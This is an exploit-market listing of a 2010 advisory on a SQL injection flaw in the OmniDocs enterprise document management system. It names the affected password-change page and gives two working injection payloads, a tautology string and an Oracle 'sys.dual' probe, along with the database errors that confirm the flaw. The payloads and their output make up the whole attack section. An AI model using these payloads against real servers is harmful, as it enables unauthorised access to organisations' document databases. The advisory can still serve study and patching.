[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Omnidocs SQL injection Vulnerability

Author
thebluegenius
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10840
Category
web applications
Date add
11-02-2010
Platform
jsp
====================================
Omnidocs SQL injection Vulnerability
====================================

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA
 
---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
 
Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications.
 
------------------
Vulnerability
------------------
 
Affected URL: http://server/omnidocs/ForceChangePassword.jsp
 
Command: ' or 'a' = 'a'
Confirmed SQL Injection error :  ORA-00907: missing right parenthesis          
 
Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated          
 
-----------------------------------------------------



#  0day.today [2024-11-14]  #